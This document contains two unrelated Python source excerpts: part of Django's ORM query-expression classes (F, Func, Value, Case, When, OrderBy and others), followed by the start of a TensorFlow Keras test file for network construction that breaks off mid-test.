        return self.output_field.get_lookup(lookup)
    def get_transform(self, name):
        return self.output_field.get_transform(name)
    def relabeled_clone(self, change_map):
        # Clone with all child expressions re-pointed at relabeled tables.
        clone = self.copy()
        clone.set_source_expressions(
            [e.relabeled_clone(change_map) for e in self.get_source_expressions()])
        return clone
    def copy(self):
        # Shallow copy; the flag marks clones as distinct from originals.
        c = copy.copy(self)
        c.copied = True
        return c
    def refs_aggregate(self, existing_aggregates):
        """
        Does this expression contain a reference to some of the
        existing aggregates? If so, returns the aggregate and also
        the lookup parts that *weren't* found. So, if
            existing_aggregates = {'max_id': Max('id')}
            self.name = 'max_id'
            queryset.filter(max_id__range=[10,100])
        then this method will return Max('id') and those parts of the
        name that weren't found. In this case `max_id` is found and the range
        portion is returned as ('range',).
        """
        for node in self.get_source_expressions():
            agg, lookup = node.refs_aggregate(existing_aggregates)
            if agg:
                return agg, lookup
        return False, ()
    def get_group_by_cols(self):
        if not self.contains_aggregate:
            return [self]
        cols = []
        for source in self.get_source_expressions():
            cols.extend(source.get_group_by_cols())
        return cols
    def get_source_fields(self):
        """
        Returns the underlying field types used by this
        aggregate.
        """
        return [e._output_field_or_none for e in self.get_source_expressions()]
    def asc(self):
        return OrderBy(self)
    def desc(self):
        return OrderBy(self, descending=True)
    def reverse_ordering(self):
        return self
    def flatten(self):
        """
        Recursively yield this expression and all subexpressions, in
        depth-first order.
        """
        yield self
        for expr in self.get_source_expressions():
            if expr:
                for inner_expr in expr.flatten():
                    yield inner_expr
class Expression(BaseExpression, Combinable):
    """
    An expression that can be combined with other expressions.
    """
    # Concrete expression types (Func, Value, ...) derive from this so they
    # inherit both the resolution machinery and the operator overloads.
    pass
class CombinedExpression(Expression):
    # Two expressions joined by a connector, e.g. F('a') + F('b').
    def __init__(self, lhs, connector, rhs, output_field=None):
        super(CombinedExpression, self).__init__(output_field=output_field)
        self.connector = connector
        self.lhs = lhs
        self.rhs = rhs
    def __repr__(self):
        return "<{}: {}>".format(self.__class__.__name__, self)
    def __str__(self):
        return "{} {} {}".format(self.lhs, self.connector, self.rhs)
    def get_source_expressions(self):
        return [self.lhs, self.rhs]
    def set_source_expressions(self, exprs):
        self.lhs, self.rhs = exprs
    def as_sql(self, compiler, connection):
        try:
            lhs_output = self.lhs.output_field
        except FieldError:
            lhs_output = None
        try:
            rhs_output = self.rhs.output_field
        except FieldError:
            rhs_output = None
        # Delegate to DurationExpression when either side is a
        # DurationField and the backend has no native duration type.
        if (not connection.features.has_native_duration_field and
                ((lhs_output and lhs_output.get_internal_type() == 'DurationField')
                or (rhs_output and rhs_output.get_internal_type() == 'DurationField'))):
            return DurationExpression(self.lhs, self.connector, self.rhs).as_sql(compiler, connection)
        expressions = []
        expression_params = []
        sql, params = compiler.compile(self.lhs)
        expressions.append(sql)
        expression_params.extend(params)
        sql, params = compiler.compile(self.rhs)
        expressions.append(sql)
        expression_params.extend(params)
        # order of precedence
        expression_wrapper = '(%s)'
        sql = connection.ops.combine_expression(self.connector, expressions)
        return expression_wrapper % sql, expression_params
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        c = self.copy()
        c.is_summary = summarize
        c.lhs = c.lhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
        c.rhs = c.rhs.resolve_expression(query, allow_joins, reuse, summarize, for_save)
        return c
class DurationExpression(CombinedExpression):
    # Combined expression for backends without a native duration type.
    def compile(self, side, compiler, connection):
        # DurationValue literals are compiled as-is; any other side whose
        # output is a DurationField gets the backend's duration-arithmetic
        # wrapper applied to its SQL.
        if not isinstance(side, DurationValue):
            try:
                output = side.output_field
            except FieldError:
                pass
            else:
                if output.get_internal_type() == 'DurationField':
                    sql, params = compiler.compile(side)
                    return connection.ops.format_for_duration_arithmetic(sql), params
        return compiler.compile(side)
    def as_sql(self, compiler, connection):
        connection.ops.check_expression_support(self)
        expressions = []
        expression_params = []
        sql, params = self.compile(self.lhs, compiler, connection)
        expressions.append(sql)
        expression_params.extend(params)
        sql, params = self.compile(self.rhs, compiler, connection)
        expressions.append(sql)
        expression_params.extend(params)
        # order of precedence
        expression_wrapper = '(%s)'
        sql = connection.ops.combine_duration_expression(self.connector, expressions)
        return expression_wrapper % sql, expression_params
class F(Combinable):
    """
    An object capable of resolving references to existing query objects.
    """
    def __init__(self, name):
        """
        Arguments:
         * name: the name of the field this expression references
        """
        self.name = name
    def __repr__(self):
        return "{}({})".format(self.__class__.__name__, self.name)
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        # Delegate to the query, which turns the name into a resolved
        # column reference.
        return query.resolve_ref(self.name, allow_joins, reuse, summarize)
    def refs_aggregate(self, existing_aggregates):
        return refs_aggregate(self.name.split(LOOKUP_SEP), existing_aggregates)
    def asc(self):
        return OrderBy(self)
    def desc(self):
        return OrderBy(self, descending=True)
class Func(Expression):
    """
    A SQL function call.
    """
    function = None
    template = '%(function)s(%(expressions)s)'
    arg_joiner = ', '
    arity = None  # The number of arguments the function accepts.
    def __init__(self, *expressions, **extra):
        if self.arity is not None and len(expressions) != self.arity:
            raise TypeError(
                "'%s' takes exactly %s %s (%s given)" % (
                    self.__class__.__name__,
                    self.arity,
                    "argument" if self.arity == 1 else "arguments",
                    len(expressions),
                )
            )
        output_field = extra.pop('output_field', None)
        super(Func, self).__init__(output_field=output_field)
        self.source_expressions = self._parse_expressions(*expressions)
        # Remaining keyword arguments become template substitution values.
        self.extra = extra
    def __repr__(self):
        args = self.arg_joiner.join(str(arg) for arg in self.source_expressions)
        extra = ', '.join(str(key) + '=' + str(val) for key, val in self.extra.items())
        if extra:
            return "{}({}, {})".format(self.__class__.__name__, args, extra)
        return "{}({})".format(self.__class__.__name__, args)
    def get_source_expressions(self):
        return self.source_expressions
    def set_source_expressions(self, exprs):
        self.source_expressions = exprs
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        c = self.copy()
        c.is_summary = summarize
        for pos, arg in enumerate(c.source_expressions):
            c.source_expressions[pos] = arg.resolve_expression(query, allow_joins, reuse, summarize, for_save)
        return c
    def as_sql(self, compiler, connection, function=None, template=None):
        connection.ops.check_expression_support(self)
        sql_parts = []
        params = []
        for arg in self.source_expressions:
            arg_sql, arg_params = compiler.compile(arg)
            sql_parts.append(arg_sql)
            params.extend(arg_params)
        if function is None:
            self.extra['function'] = self.extra.get('function', self.function)
        else:
            self.extra['function'] = function
        # 'field' mirrors 'expressions' - presumably so templates can use
        # either placeholder name; confirm before removing.
        self.extra['expressions'] = self.extra['field'] = self.arg_joiner.join(sql_parts)
        template = template or self.extra.get('template', self.template)
        return template % self.extra, params
    def as_sqlite(self, *args, **kwargs):
        sql, params = self.as_sql(*args, **kwargs)
        try:
            # Force a NUMERIC cast for decimal outputs on SQLite.
            if self.output_field.get_internal_type() == 'DecimalField':
                sql = 'CAST(%s AS NUMERIC)' % sql
        except FieldError:
            pass
        return sql, params
    def copy(self):
        # Copy the mutable containers so clones don't share state.
        copy = super(Func, self).copy()
        copy.source_expressions = self.source_expressions[:]
        copy.extra = self.extra.copy()
        return copy
class Value(Expression):
    """
    Represents a wrapped value as a node within an expression
    """
    def __init__(self, value, output_field=None):
        """
        Arguments:
        * value: the value this expression represents. The value will be
          added into the sql parameter list and properly quoted.
        * output_field: an instance of the model field type that this
          expression will return, such as IntegerField() or CharField().
        """
        super(Value, self).__init__(output_field=output_field)
        self.value = value

    def __repr__(self):
        return "{}({})".format(self.__class__.__name__, self.value)

    def as_sql(self, compiler, connection):
        connection.ops.check_expression_support(self)
        val = self.value
        # Inspect _output_field (not output_field) so an unresolved field
        # doesn't trigger an exception; only prepare when one is set.
        if self._output_field is not None:
            if self.for_save:
                prepare = self.output_field.get_db_prep_save
            else:
                prepare = self.output_field.get_db_prep_value
            val = prepare(val, connection=connection)
        if val is None:
            # cx_Oracle does not always convert None to the appropriate
            # NULL type (like in case expressions using numbers), so we
            # use a literal SQL NULL
            return 'NULL', []
        return '%s', [val]

    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        clone = super(Value, self).resolve_expression(query, allow_joins, reuse, summarize, for_save)
        # Remember whether the value is destined for an INSERT/UPDATE so
        # as_sql() can pick the right db-prep method.
        clone.for_save = for_save
        return clone

    def get_group_by_cols(self):
        # A constant never contributes to GROUP BY.
        return []
class DurationValue(Value):
    # A Value whose payload is rendered as a SQL duration/interval.
    def as_sql(self, compiler, connection):
        connection.ops.check_expression_support(self)
        # When the backend has a native duration column type AND the driver
        # accepts timedelta parameters directly, defer to plain Value
        # rendering; otherwise ask the backend for interval SQL syntax.
        if (connection.features.has_native_duration_field and
                connection.features.driver_supports_timedelta_args):
            return super(DurationValue, self).as_sql(compiler, connection)
        return connection.ops.date_interval_sql(self.value)
class RawSQL(Expression):
    """A raw SQL fragment plus its parameters, usable as an expression node."""

    def __init__(self, sql, params, output_field=None):
        self.sql = sql
        self.params = params
        # Default to a generic Field when no output type is declared.
        if output_field is None:
            output_field = fields.Field()
        super(RawSQL, self).__init__(output_field=output_field)

    def __repr__(self):
        return "{}({}, {})".format(self.__class__.__name__, self.sql, self.params)

    def as_sql(self, compiler, connection):
        # Parenthesize so the fragment composes safely inside larger SQL.
        return '(%s)' % self.sql, self.params

    def get_group_by_cols(self):
        # The raw fragment itself is the grouping expression.
        return [self]
class Star(Expression):
    # Renders as the SQL "*" selector (e.g. in COUNT(*)).
    def __repr__(self):
        return "'*'"
    def as_sql(self, compiler, connection):
        return '*', []
class Random(Expression):
    # Backend-specific random-number function; always yields a float.
    def __init__(self):
        super(Random, self).__init__(output_field=fields.FloatField())
    def __repr__(self):
        return "Random()"
    def as_sql(self, compiler, connection):
        return connection.ops.random_function_sql(), []
class Col(Expression):
    """A reference to a database column, qualified by a table alias."""

    # Signals to the compiler machinery that this node references a column.
    contains_column_references = True

    def __init__(self, alias, target, output_field=None):
        # Default the output type to the referenced field itself.
        if output_field is None:
            output_field = target
        super(Col, self).__init__(output_field=output_field)
        self.alias = alias
        self.target = target

    def __repr__(self):
        return "{}({}, {})".format(
            self.__class__.__name__, self.alias, self.target)

    def as_sql(self, compiler, connection):
        quote = compiler.quote_name_unless_alias
        return "%s.%s" % (quote(self.alias), quote(self.target.column)), []

    def relabeled_clone(self, relabels):
        new_alias = relabels.get(self.alias, self.alias)
        return self.__class__(new_alias, self.target, self.output_field)

    def get_group_by_cols(self):
        return [self]

    def get_db_converters(self, connection):
        converters = self.output_field.get_db_converters(connection)
        # When target and output field differ, both sets of converters apply.
        if self.target == self.output_field:
            return converters
        return converters + self.target.get_db_converters(connection)
class Ref(Expression):
    """
    Reference to column alias of the query. For example, Ref('sum_cost') in
    qs.annotate(sum_cost=Sum('cost')) query.
    """
    def __init__(self, refs, source):
        super(Ref, self).__init__()
        self.refs = refs
        self.source = source

    def __repr__(self):
        return "{}({}, {})".format(self.__class__.__name__, self.refs, self.source)

    def get_source_expressions(self):
        return [self.source]

    def set_source_expressions(self, exprs):
        self.source, = exprs

    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        # `source` was resolved when it was annotated onto the query; this
        # node is only a by-name reference to it, so there is nothing to do.
        return self

    def relabeled_clone(self, relabels):
        # Table aliases never appear in the rendered alias reference.
        return self

    def as_sql(self, compiler, connection):
        return "%s" % connection.ops.quote_name(self.refs), []

    def get_group_by_cols(self):
        return [self]
class ExpressionWrapper(Expression):
    """
    An expression that can wrap another expression so that it can provide
    extra context to the inner expression, such as the output_field.
    """
    def __init__(self, expression, output_field):
        super(ExpressionWrapper, self).__init__(output_field=output_field)
        self.expression = expression

    def __repr__(self):
        return "{}({})".format(self.__class__.__name__, self.expression)

    def get_source_expressions(self):
        return [self.expression]

    def set_source_expressions(self, exprs):
        self.expression = exprs[0]

    def as_sql(self, compiler, connection):
        # SQL generation is delegated entirely to the wrapped expression.
        return self.expression.as_sql(compiler, connection)
class When(Expression):
    """
    A single ``WHEN <condition> THEN <result>`` clause for use inside Case().
    Accepts either a Q object as `condition` or field lookups as keyword
    arguments (which are wrapped into a Q).
    """
    template = 'WHEN %(condition)s THEN %(result)s'
    def __init__(self, condition=None, then=None, **lookups):
        # Keyword lookups (e.g. When(age__gt=18, then=...)) become a Q;
        # mixing lookups with an explicit condition, or supplying neither,
        # is rejected below.
        if lookups and condition is None:
            condition, lookups = Q(**lookups), None
        if condition is None or not isinstance(condition, Q) or lookups:
            raise TypeError("__init__() takes either a Q object or lookups as keyword arguments")
        super(When, self).__init__(output_field=None)
        self.condition = condition
        self.result = self._parse_expressions(then)[0]
    def __str__(self):
        return "WHEN %r THEN %r" % (self.condition, self.result)
    def __repr__(self):
        return "<%s: %s>" % (self.__class__.__name__, self)
    def get_source_expressions(self):
        return [self.condition, self.result]
    def set_source_expressions(self, exprs):
        self.condition, self.result = exprs
    def get_source_fields(self):
        # We're only interested in the fields of the result expressions.
        return [self.result._output_field_or_none]
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        c = self.copy()
        c.is_summary = summarize
        # The condition is a filter, never a saved value: for_save=False.
        c.condition = c.condition.resolve_expression(query, allow_joins, reuse, summarize, False)
        c.result = c.result.resolve_expression(query, allow_joins, reuse, summarize, for_save)
        return c
    def as_sql(self, compiler, connection, template=None):
        connection.ops.check_expression_support(self)
        template_params = {}
        sql_params = []
        # Parameter order must match template order: condition, then result.
        condition_sql, condition_params = compiler.compile(self.condition)
        template_params['condition'] = condition_sql
        sql_params.extend(condition_params)
        result_sql, result_params = compiler.compile(self.result)
        template_params['result'] = result_sql
        sql_params.extend(result_params)
        template = template or self.template
        return template % template_params, sql_params
    def get_group_by_cols(self):
        # This is not a complete expression and cannot be used in GROUP BY.
        cols = []
        for source in self.get_source_expressions():
            cols.extend(source.get_group_by_cols())
        return cols
class Case(Expression):
    """
    An SQL searched CASE expression:
        CASE
            WHEN n > 0
                THEN 'positive'
            WHEN n < 0
                THEN 'negative'
            ELSE 'zero'
        END
    """
    template = 'CASE %(cases)s ELSE %(default)s END'
    case_joiner = ' '
    def __init__(self, *cases, **extra):
        if not all(isinstance(case, When) for case in cases):
            raise TypeError("Positional arguments must all be When objects.")
        default = extra.pop('default', None)
        output_field = extra.pop('output_field', None)
        super(Case, self).__init__(output_field)
        self.cases = list(cases)
        self.default = self._parse_expressions(default)[0]
    def __str__(self):
        return "CASE %s, ELSE %r" % (', '.join(str(c) for c in self.cases), self.default)
    def __repr__(self):
        return "<%s: %s>" % (self.__class__.__name__, self)
    def get_source_expressions(self):
        # The default is always the last source expression.
        return self.cases + [self.default]
    def set_source_expressions(self, exprs):
        self.cases = exprs[:-1]
        self.default = exprs[-1]
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        c = self.copy()
        c.is_summary = summarize
        for pos, case in enumerate(c.cases):
            c.cases[pos] = case.resolve_expression(query, allow_joins, reuse, summarize, for_save)
        c.default = c.default.resolve_expression(query, allow_joins, reuse, summarize, for_save)
        return c
    def copy(self):
        c = super(Case, self).copy()
        # Shallow-copy the cases list so resolving a clone doesn't mutate ours.
        c.cases = c.cases[:]
        return c
    def as_sql(self, compiler, connection, template=None, extra=None):
        connection.ops.check_expression_support(self)
        if not self.cases:
            # A CASE with no WHEN clauses collapses to its default value.
            return compiler.compile(self.default)
        template_params = dict(extra) if extra else {}
        case_parts = []
        sql_params = []
        for case in self.cases:
            case_sql, case_params = compiler.compile(case)
            case_parts.append(case_sql)
            sql_params.extend(case_params)
        template_params['cases'] = self.case_joiner.join(case_parts)
        default_sql, default_params = compiler.compile(self.default)
        template_params['default'] = default_sql
        sql_params.extend(default_params)
        template = template or self.template
        sql = template % template_params
        if self._output_field_or_none is not None:
            # Cast so all branches come back as the declared output type.
            sql = connection.ops.unification_cast_sql(self.output_field) % sql
        return sql, sql_params
class Date(Expression):
    """
    Add a date selection column.
    Truncates the resolved column to `lookup_type` granularity; used to
    implement date-based selection over a DateField.
    """
    def __init__(self, lookup, lookup_type):
        super(Date, self).__init__(output_field=fields.DateField())
        self.lookup = lookup  # name/path of the field being truncated
        self.col = None  # resolved column; filled in by resolve_expression()
        self.lookup_type = lookup_type
    def __repr__(self):
        return "{}({}, {})".format(self.__class__.__name__, self.lookup, self.lookup_type)
    def get_source_expressions(self):
        return [self.col]
    def set_source_expressions(self, exprs):
        self.col, = exprs
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        copy = self.copy()
        copy.col = query.resolve_ref(self.lookup, allow_joins, reuse, summarize)
        field = copy.col.output_field
        assert isinstance(field, fields.DateField), "%r isn't a DateField." % field.name
        if settings.USE_TZ:
            # NOTE: DateTimeField subclasses DateField, so it passes the
            # check above; with USE_TZ it must be rejected explicitly since
            # plain date truncation ignores timezone conversion.
            assert not isinstance(field, fields.DateTimeField), (
                "%r is a DateTimeField, not a DateField." % field.name
            )
        return copy
    def as_sql(self, compiler, connection):
        sql, params = self.col.as_sql(compiler, connection)
        # A bare column reference must not carry parameters of its own.
        assert not(params)
        return connection.ops.date_trunc_sql(self.lookup_type, sql), []
    def copy(self):
        copy = super(Date, self).copy()
        copy.lookup = self.lookup
        copy.lookup_type = self.lookup_type
        return copy
    def convert_value(self, value, expression, connection, context):
        # Some backends return datetimes for truncated dates; strip the time.
        if isinstance(value, datetime.datetime):
            value = value.date()
        return value
class DateTime(Expression):
    """
    Add a datetime selection column.
    Truncates the resolved column to `lookup_type` granularity in the given
    timezone; used to implement datetime-based selection over a DateTimeField.
    """
    def __init__(self, lookup, lookup_type, tzinfo):
        super(DateTime, self).__init__(output_field=fields.DateTimeField())
        self.lookup = lookup  # name/path of the field being truncated
        self.col = None  # resolved column; filled in by resolve_expression()
        self.lookup_type = lookup_type
        # Resolve the timezone name once up front; it is passed to the
        # backend's datetime_trunc_sql() when rendering.
        if tzinfo is None:
            self.tzname = None
        else:
            self.tzname = timezone._get_timezone_name(tzinfo)
        self.tzinfo = tzinfo
    def __repr__(self):
        return "{}({}, {}, {})".format(
            self.__class__.__name__, self.lookup, self.lookup_type, self.tzinfo)
    def get_source_expressions(self):
        return [self.col]
    def set_source_expressions(self, exprs):
        self.col, = exprs
    def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
        copy = self.copy()
        copy.col = query.resolve_ref(self.lookup, allow_joins, reuse, summarize)
        field = copy.col.output_field
        assert isinstance(field, fields.DateTimeField), (
            "%r isn't a DateTimeField." % field.name
        )
        return copy
    def as_sql(self, compiler, connection):
        sql, params = self.col.as_sql(compiler, connection)
        # A bare column reference must not carry parameters of its own.
        assert not(params)
        return connection.ops.datetime_trunc_sql(self.lookup_type, sql, self.tzname)
    def copy(self):
        copy = super(DateTime, self).copy()
        copy.lookup = self.lookup
        copy.lookup_type = self.lookup_type
        copy.tzname = self.tzname
        return copy
    def convert_value(self, value, expression, connection, context):
        if settings.USE_TZ:
            if value is None:
                raise ValueError(
                    "Database returned an invalid value in QuerySet.datetimes(). "
                    "Are time zone definitions for your database and pytz installed?"
                )
            # The database returns a naive datetime; reinterpret it in the
            # requested timezone.
            value = value.replace(tzinfo=None)
            value = timezone.make_aware(value, self.tzinfo)
        return value
class OrderBy(BaseExpression):
    """Wraps an expression together with an ASC/DESC ordering direction."""

    template = '%(expression)s %(ordering)s'

    def __init__(self, expression, descending=False):
        self.descending = descending
        if not hasattr(expression, 'resolve_expression'):
            raise ValueError('expression must be an expression type')
        self.expression = expression

    def __repr__(self):
        return "{}({}, descending={})".format(
            self.__class__.__name__, self.expression, self.descending)

    def set_source_expressions(self, exprs):
        self.expression = exprs[0]

    def get_source_expressions(self):
        return [self.expression]

    def as_sql(self, compiler, connection):
        connection.ops.check_expression_support(self)
        expression_sql, params = compiler.compile(self.expression)
        direction = 'DESC' if self.descending else 'ASC'
        sql = self.template % {
            'expression': expression_sql,
            'ordering': direction,
        }
        return sql.rstrip(), params

    def get_group_by_cols(self):
        # Flatten the group-by columns of every source expression.
        return [
            col
            for source in self.get_source_expressions()
            for col in source.get_group_by_cols()
        ]

    def reverse_ordering(self):
        # Flip the direction in place and return self for chaining.
        self.descending = not self.descending
        return self

    def asc(self):
        self.descending = False

    def desc(self):
        self.descending = True
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for layer graphs construction & handling."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import input_layer as input_layer_lib
from tensorflow.python.keras.engine import network as network_lib
from tensorflow.python.keras.engine import training
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.platform import test
try:
import yaml # pylint:disable=g-import-not-at-top
except ImportError:
yaml = None
class NetworkConstructionTest(keras_parameterized.TestCase):
  @test_util.run_deprecated_v1
  def test_get_updates(self):
    """Unconditional (build-time) and conditional (call-time, inputs=True)
    updates are tracked separately and aggregated across layer/network reuse."""

    class MyLayer(keras.layers.Layer):

      def build(self, input_shape):
        self.a = self.add_variable('a',
                                   (1, 1),
                                   'float32',
                                   trainable=False)
        self.b = self.add_variable('b',
                                   (1, 1),
                                   'float32',
                                   trainable=False)
        # Created in build() without inputs: an unconditional update.
        self.add_update(state_ops.assign_add(self.a, [[1.]],
                                             name='unconditional_update'))
        self.built = True

      def call(self, inputs):
        # Created in call() with inputs=True: conditional on `inputs`.
        self.add_update(state_ops.assign_add(self.b, inputs,
                                             name='conditional_update'),
                        inputs=True)
        return inputs + 1

    x1 = input_layer_lib.Input(shape=(1,))
    layer = MyLayer()
    _ = layer.apply(x1)

    self.assertEqual(len(layer.updates), 2)
    self.assertEqual(len(layer.get_updates_for(x1)), 1)
    self.assertEqual(len(layer.get_updates_for(None)), 1)

    x2 = input_layer_lib.Input(shape=(1,))
    y2 = layer.apply(x2)

    self.assertEqual(len(layer.updates), 3)
    self.assertEqual(len(layer.get_updates_for(x1)), 1)
    self.assertEqual(len(layer.get_updates_for(x2)), 1)
    self.assertEqual(len(layer.get_updates_for(None)), 1)

    network = network_lib.Network(x2, y2)
    self.assertEqual(len(network.updates), 3)
    self.assertEqual(len(network.get_updates_for(x2)), 1)
    self.assertEqual(len(network.get_updates_for(None)), 1)

    # Applying the shared layer outside the network still surfaces the new
    # update through the network's aggregate view.
    x3 = input_layer_lib.Input(shape=(1,))
    _ = layer.apply(x3)
    self.assertEqual(len(network.updates), 4)

    x4 = input_layer_lib.Input(shape=(1,))
    _ = network(x4)
    self.assertEqual(len(network.updates), 5)
    self.assertEqual(len(network.get_updates_for(x2)), 1)
    self.assertEqual(len(network.get_updates_for(x4)), 1)
    self.assertEqual(len(network.get_updates_for(None)), 1)

    network.add_update(state_ops.assign_add(layer.a, [[1]]))
    self.assertEqual(len(network.updates), 6)
    self.assertEqual(len(network.get_updates_for(None)), 2)

    network.add_update(state_ops.assign_add(layer.b, x4), inputs=True)
    self.assertEqual(len(network.updates), 7)
    self.assertEqual(len(network.get_updates_for(x4)), 2)
  @test_util.run_in_graph_and_eager_modes()
  def test_get_updates_bn(self):
    """BatchNormalization registers two input-conditional updates (its
    moving-statistics assignments) and no unconditional ones."""
    x1 = input_layer_lib.Input(shape=(1,))
    layer = keras.layers.BatchNormalization()
    _ = layer.apply(x1)

    self.assertEqual(len(layer.updates), 2)
    self.assertEqual(len(layer.get_updates_for(x1)), 2)
    self.assertEqual(len(layer.get_updates_for(None)), 0)
  @test_util.run_deprecated_v1
  def test_get_losses(self):
    """Losses mirror updates: build-time losses are unconditional, call-time
    losses (inputs=True) are tracked per input tensor."""

    class MyLayer(keras.layers.Layer):

      def build(self, input_shape):
        self.a = self.add_variable('a',
                                   (1, 1),
                                   'float32',
                                   trainable=False)
        self.b = self.add_variable('b',
                                   (1, 1),
                                   'float32',
                                   trainable=False)
        # Unconditional loss (depends only on a weight).
        self.add_loss(math_ops.reduce_sum(self.a))
        self.built = True

      def call(self, inputs):
        # Conditional loss, tied to the inputs of this call.
        self.add_loss(math_ops.reduce_sum(inputs),
                      inputs=True)
        return inputs + 1

    x1 = input_layer_lib.Input(shape=(1,))
    layer = MyLayer()
    _ = layer.apply(x1)

    self.assertEqual(len(layer.losses), 2)
    self.assertEqual(len(layer.get_losses_for(x1)), 1)
    self.assertEqual(len(layer.get_losses_for(None)), 1)

    x2 = input_layer_lib.Input(shape=(1,))
    y2 = layer.apply(x2)

    self.assertEqual(len(layer.losses), 3)
    self.assertEqual(len(layer.get_losses_for(x1)), 1)
    self.assertEqual(len(layer.get_losses_for(x2)), 1)
    self.assertEqual(len(layer.get_losses_for(None)), 1)

    network = network_lib.Network(x2, y2)
    self.assertEqual(len(network.losses), 3)
    self.assertEqual(len(network.get_losses_for(x1)), 1)
    self.assertEqual(len(network.get_losses_for(x2)), 1)
    self.assertEqual(len(network.get_losses_for(None)), 1)

    x3 = input_layer_lib.Input(shape=(1,))
    _ = layer.apply(x3)
    self.assertEqual(len(network.losses), 4)

    x4 = input_layer_lib.Input(shape=(1,))
    _ = network(x4)
    self.assertEqual(len(network.losses), 5)
    self.assertEqual(len(network.get_losses_for(x2)), 1)
    self.assertEqual(len(network.get_losses_for(x4)), 1)
    self.assertEqual(len(network.get_losses_for(None)), 1)
  @test_util.run_in_graph_and_eager_modes()
  def testTopologicalAttributes(self):
    """input/output/shape accessors and `get_*_at` node lookups, plus the
    errors raised when a layer has no (or ambiguous) inbound nodes."""
    # test layer attributes / methods related to cross-layer connectivity.
    a = input_layer_lib.Input(shape=(32,), name='input_a')
    b = input_layer_lib.Input(shape=(32,), name='input_b')

    # test input, output, input_shape, output_shape
    test_layer = keras.layers.Dense(16, name='test_layer')
    a_test = test_layer(a)
    self.assertEqual(test_layer.input, a)
    self.assertEqual(test_layer.output, a_test)
    self.assertEqual(test_layer.input_shape, (None, 32))
    self.assertEqual(test_layer.output_shape, (None, 16))

    # test `get_*_at` methods
    dense = keras.layers.Dense(16, name='dense_1')
    a_2 = dense(a)
    b_2 = dense(b)

    self.assertEqual(dense.get_input_at(0), a)
    self.assertEqual(dense.get_input_at(1), b)
    self.assertEqual(dense.get_output_at(0), a_2)
    self.assertEqual(dense.get_output_at(1), b_2)
    self.assertEqual(dense.get_input_shape_at(0), (None, 32))
    self.assertEqual(dense.get_input_shape_at(1), (None, 32))
    self.assertEqual(dense.get_output_shape_at(0), (None, 16))
    self.assertEqual(dense.get_output_shape_at(1), (None, 16))

    # Test invalid value for attribute retrieval.
    with self.assertRaises(ValueError):
      dense.get_input_at(2)
    with self.assertRaises(AttributeError):
      new_dense = keras.layers.Dense(16)
      _ = new_dense.input
    with self.assertRaises(AttributeError):
      new_dense = keras.layers.Dense(16)
      _ = new_dense.output
    with self.assertRaises(AttributeError):
      new_dense = keras.layers.Dense(16)
      _ = new_dense.output_shape
    with self.assertRaises(AttributeError):
      new_dense = keras.layers.Dense(16)
      _ = new_dense.input_shape
    with self.assertRaises(AttributeError):
      # A never-called layer has no shape info even when other layers in the
      # graph have been called on multiple (incompatible) inputs.
      new_dense = keras.layers.Dense(16)
      a = input_layer_lib.Input(shape=(3, 32))
      a = input_layer_lib.Input(shape=(5, 32))
      a_2 = dense(a)
      b_2 = dense(b)
      _ = new_dense.input_shape
    with self.assertRaises(AttributeError):
      new_dense = keras.layers.Dense(16)
      a = input_layer_lib.Input(shape=(3, 32))
      a = input_layer_lib.Input(shape=(5, 32))
      a_2 = dense(a)
      b_2 = dense(b)
      _ = new_dense.output_shape
  @test_util.run_in_graph_and_eager_modes()
  def testTopologicalAttributesMultiOutputLayer(self):
    """A layer returning a list of tensors exposes list-valued output and
    output_shape attributes."""

    class PowersLayer(keras.layers.Layer):

      def call(self, inputs):
        return [inputs**2, inputs**3]

    x = input_layer_lib.Input(shape=(32,))
    test_layer = PowersLayer()
    p1, p2 = test_layer(x)  # pylint: disable=not-callable

    self.assertEqual(test_layer.input, x)
    self.assertEqual(test_layer.output, [p1, p2])
    self.assertEqual(test_layer.input_shape, (None, 32))
    self.assertEqual(test_layer.output_shape, [(None, 32), (None, 32)])
  @test_util.run_in_graph_and_eager_modes()
  def testTopologicalAttributesMultiInputLayer(self):
    """A layer taking a list of tensors exposes list-valued input and
    input_shape attributes."""

    class AddLayer(keras.layers.Layer):

      def call(self, inputs):
        assert len(inputs) == 2
        return inputs[0] + inputs[1]

    a = input_layer_lib.Input(shape=(32,))
    b = input_layer_lib.Input(shape=(32,))
    test_layer = AddLayer()
    y = test_layer([a, b])  # pylint: disable=not-callable

    self.assertEqual(test_layer.input, [a, b])
    self.assertEqual(test_layer.output, y)
    self.assertEqual(test_layer.input_shape, [(None, 32), (None, 32)])
    self.assertEqual(test_layer.output_shape, (None, 32))
  @test_util.run_deprecated_v1
  def testBasicNetwork(self):
    """Minimal Network: attributes, weight views, re-callability on both
    Keras Inputs and plain tensors, and the network-level `trainable` flag."""
    # minimum viable network
    x = input_layer_lib.Input(shape=(32,))
    dense = keras.layers.Dense(2)
    y = dense(x)
    network = network_lib.Network(x, y, name='dense_network')

    # test basic attributes
